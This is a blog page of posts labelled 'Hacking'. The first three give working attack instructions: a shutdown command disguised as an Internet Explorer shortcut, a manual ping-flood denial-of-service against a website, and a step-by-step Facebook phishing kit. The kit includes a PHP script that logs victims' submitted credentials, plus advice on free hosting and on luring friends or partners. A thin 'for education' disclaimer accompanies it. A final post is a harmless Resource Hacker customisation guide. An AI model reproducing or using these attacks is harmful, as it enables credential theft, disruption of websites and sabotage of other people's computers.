Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Sunday, 1 December 2013

Double click on Internet explorer to Restart the Computer

Double click on Internet explorer to Restart the Computer:

1) Goto Desktop
2) Right click > new > Shortcut
3) In “Type the Location of the item” > write: “C:\WINDOWS
\system32\shutdown.exe -r -t 00? without coutes.
4) Click next and in “Type a name for this shortcut” write ”
Internet Explorer” and click Finish.
5) Now Right Click on the shortcut of Internet Explorer and
goto “Change Icon” and select the icon of Internet
Explorer.
6) Now Virus is Ready… haha.. check it out.. when you will
double click on Internet Explorer Shortcut… Computer will
Restart.

Website Hacking

DOS Attack Manually:-

First Open Cmd
From Run => Cmd
Now Follow These Steps -:
1. Now Type This Command In CMD :
Ping www.anysite.com
2. Now Type =>ping (i.p of site) –t –l 65000
here 65000 is packets

And You Will Get The I.P of Victim

Now Your PC Will Send A Huge Traffic To That Site…

Check That Site After 1 Hours it will be Down..!!!
Try This From More PC For A Good Response..!!

Facebook Hacking

Facebook is one of the best social networking website. All of you want to hack your friends , girlfriends/boyfriends facebook account to know what they are doing. And from last few days many of you were asking HOW TO HACK A FACEBOOK ACCOUNT. So This post is for all of you who were asking me how to hack a facebook account.

I AM NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS






So now i am starting to show you how to hack someone by phishing...




STEP 1: Go to Facebook
Right click on the white space of the front page under the logo.

"View Page source".
Copy the code to Notepad. not wordpad


STEP 2: Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:




You have to change two things in that code..first of all you have to change method from POST to Get...as You can see in picture.
and secondly you have to change ACTION from https://login.facebook.com/login.php"
to "next.php"

Save the document as index.html

& Change the file type as All Files.

STEP 3:

Now we need to create the "next.php" to store the password.  so open the notepad and type the code given below:
:


<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this file as "next.php"




Step 4:

open the notepad and Now create a blank file and named it as  "passwords.txt".
Now onwards You have three files..first is "index.html".Second is "next.php" and third is "passwords.txt"
Now we have to upload this three files on a php web hosting service.
many sites offers this kind of hosting services.but maximum of them are now stopped these services cause of use of them in hacking.others are still running but they are Providing paid services only.
 

so guys there are only few sties like  000webhost.com On internet , which is an industry leader in providing top class free web hosting services without advertising! There are no hidden costs, no adverts, and no restrictive terms. and there are only some sites which allows our phishing page
So now lets come to topic again...

STEP 5: Go to on  free webhost eg:- 000webhost.com 

other website may identify the page

and click on sign up. and select any domain name eg :- xxxxxxxx.site88.com


STEP 6:After doing above steps you have to verify your mail account that you used at the time of signup process.Verify your mail account.


STEP 7:Click on the site link which is shown under DOMAIN section to go to your control panel alternativly You can go to
http://members.000webhost.com/
for fake page uploading.


STEP 8: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered,






 and then Go to File Manager under Files and log into it.






STEP 9: After logging to Your File manager Section. Now Click on the Public_html directory.


 STEP 10: Before proceeding to next delete default.php under public_html directry.Now click on the Upload button, choose the three file that we created earlier.(index.html, next.php and passwords.txt).



STEP 11: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, the username and password would be go to "passwords.txt" file.



STEP 12: Now Everything is set. The Only thing that we have to do is that pass the link to victim.after that if he/she login through that link then we are able to get his/her account and password.



                                               FOR EDUCATION PURPOSE ONLY !!!

Monday, 13 May 2013

All About Resource Hacker, Ultimate Windows Customization Tool


All About Resource Hacker, Ultimate Windows Customization Tool 



Resource Hacker is a small but excellent tool to modify system files like DLL, EXE, CPL, etc. You can even change Windows look by editing various Windows files and replacing their resources using Resource Hacker.
You can download it using following link:
 Download Resource Hacker 3.6.0
This tutorial will help you in understanding this tool and will teach you how to use it. For your convenience, we have divided this tutorial in 2 parts:
  • PART 1: BASIC INFORMATION
  • PART 2: ADVANCED INFORMATION
Part 1 provides basic details like viewing or replacing existing resources in a file, etc. Part 2covers some advance information for geeks, like adding new resources, using scripts, etc.

PART1 : BASIC INFORMATION
[Using Resource Hacker]
When you open a file in Resource Hacker, it shows various directories in left-side pane, like:
  • AVI - Contains AVI files
  • Cursor - Contains Cursor files
  • Bitmap - Contains BMP files
  • Icon - Contains Icons
  • Menu - Contains Menus
  • Dialog - Contains Dialog boxes
  • String Table - Contains Strings
  • Accelerators - Contains Shortcut keys
  • Version Info - Contains Version information of the file

[Viewing Resources]
You can view resource present in the file by expanding the directory given in left-side pane and clicking on the name of the resource. Each resource contains 3 important attributes:
  • Resource Type
  • Resource Name
  • Resource Language
[Changing Resources]
For Icons / Cursors / Bitmaps:
1. First select the resource ( e.g. Bitmap < 131 < 1033 ).
2. Now click on Action < Replace Icon or Cursor or Bitmap....


3.
 It'll open a new window, click on Open file with new Icon or Cursor or Bitmapbutton.
4. Select the desired resource using OPEN dialog box, click on Open button and then click onReplace button.
For Other Resources like AVI:
1. Click on Action < Replace Other Resource....
2. It'll open a new window, click on Open file with new resource button.
3. Select the file and click on Open button.
4. Now you'll need to provide following required information for the resource, which we mentioned earlier:
  • Resource Type
  • Resource Name
  • Resource Language

Resource Type:
 Mention type of the resource, e.g. if you are replacing AVI file, mention the type as AVI
Resource Name: Provide the same name of the existing resource which you want to replace
Resource Language: Provide language code for the resource, e.g. 1033 for English. You can check existing resource's language code.
5. At last click on Replace button.
[For Menus / Strings / Dialogs]
To change any String, Menu or Dialog box, Select the desired resource, e.g. String Table < 4 < 1033, make your changes and at last click on Compile Script button.



It'll immediately compile the script. If you made any mistake while modifying the resource, it'll generate error message so that you can fix it.

PART2 : ADVANCED INFORMATION

[Adding New Resources]
Adding New Bitmaps / Icons / Cursors / AVIs:
1. Click on Action < Add a new Resource....
2. Now click on Open file with new resource button.


3. Select the desired resource and click on Open button.
4. Give Resource Type, Name and Language as mentioned earlier. But keep in mind that Resource Name should not match with any existing resources name.
5. At last click on Add Resource button.
Adding New Menus:
Go to desired menu, e.g. Menu < 215 < 1033. Now add a new line anywhere inside POPUP ""using following format:
 MENUITEM "Custom_String", 12345, MFT_STRING, MFS_GRAYED | MFS_DEFAULT
Where:
  • "Custom_String" is the actual text which you want to show in menu.
  • 12345 is the identifier. It must be different from existing menuitems.
  • MFS_GRAYED disables the menuitem. You can change it to MFS_ENABLED if you want to show your menuitem enabled.
  • MFS_DEFAULT shows your menuitem in BOLD. You can omit it.
  • You can also add a new attribute in the code MFS_HILITE which automatically selects your menuitem.
In fact you can only add following new line in code:
 MENUITEM "Custom_String", 12345
And Resource Hacker will automatically insert other remaining values as mentioned above.
[Inserting Newly Added Resources in Dialog Boxes]
Once you finish adding new Icons / Bitmaps / AVIs, you can insert them in any dialog box so that you can show in various Windows dialog boxes like RUN, Progress Dialog box, etc.
1. Go to the desired dialog box, e.g. Dialog < 1020 < 1033
2. Right-click in the dialog box and select Insert Control option.


3.
 It'll open a new window. You'll see many controls in the new window, like BITMAP, LABEL, ICON, BUTTON, SysAnimate32 (for AVIs), etc.
4. Click on any desired control, e.g. to insert a Bitmap, click on the BITMAP control or to insert an AVI, click on SysAnimate32 control.




PS: You can also insert Date/Time in dialog box using SysDateTimePick32 control.
5. Don't forget to fill the Caption entry. You need to enter the Resource Name in Caption textbox, e.g. if you have added a Bitmap and set its Resource Name as 401, then give the same 401 in Caption textbox.



PS: For AVI Control ( SysAnimate32 ), you'll need to append # in Caption value, e.g if the AVI name is 144, then put #144 in Caption textbox.
6. At last click on OK button & then Compile the script. 
7. If you want to change the position of the new control in dialog box, simply click on the control and drag it to your desired location or you can also use arrow keys to move it.
Using Scripts in Resource Hacker
We can also run Resource Hacker using Command Prompt and can use scripts to automate lots of repeatative tasks to save our time.
You can use scripts in 2 ways:
  • Single Command
  • Multiple Commands
[Single Command]
You can use following commands in Command Prompt to perform actions using Resource Hacker:
 -add ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-addskip ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-addoverwrite ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-modify ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-extract ExeFileName, ResourceAddress, ResourceType, ResourceName,
-delete ExeFileName, ResultingFileName, ResourceType, ResourceName,
Where:
  • ExeFileName - Source file name
  • ResultingFileName - Output file name
  • ResourceAddress - Resource location (e.g. Bitmap path stored in your hard disk)
  • ResourceType - Resource type (e.g. Bitmap, AVI, etc.)
  • ResourceName - Resource name (e.g. 131, 1020, etc.)
Example:
 ResHacker.exe -addoverwrite explorer.exe, explorer1.exe, MyImage.bmp , bitmap, 143,
[Multiple Commands]
You can also run a series of commands using script. First you'll need to create the script file using Notepad and then you can run it using following command:
 ResHacker.exe -script ScriptFileName
Where, ScriptFileName is the name of the script file which you created in Notepad.
Following is the required format of the script file:
 [FILENAMES]
Exe=
SaveAs=
Log=
[COMMANDS]
-addoverwrite ResourceAddress, ResourceType, ResourceName
Where:
EXE= contains source file name
SaveAs= contains output file name
Log= contains LOG file name which will store a detailed log of the operation
[COMMANDS] section contains the command-set which we want to perform on the source file.
PS: You can omit the LOG= entry in script file. In this case, Resource Hacker will automatically create a LOG file with the name "ResHacker.log".
NOTE: If you are facing problems while saving a file after editing in resource hacker, then make sure you have disabled WFP (Windows File Protection) service using "WFP Patcher" or use "Replacer" to replace the file.
Also if you are getting error "Can't create file...", that means you have edited and saved the same file in past and there is a backup file which needs to be deleted before saving this file again. Go to the folder containing this file and you'll see a similar file having "_original" in its name. Delete it and try to save the file in resource hacker.
................................................................................
Enjoy...(Y)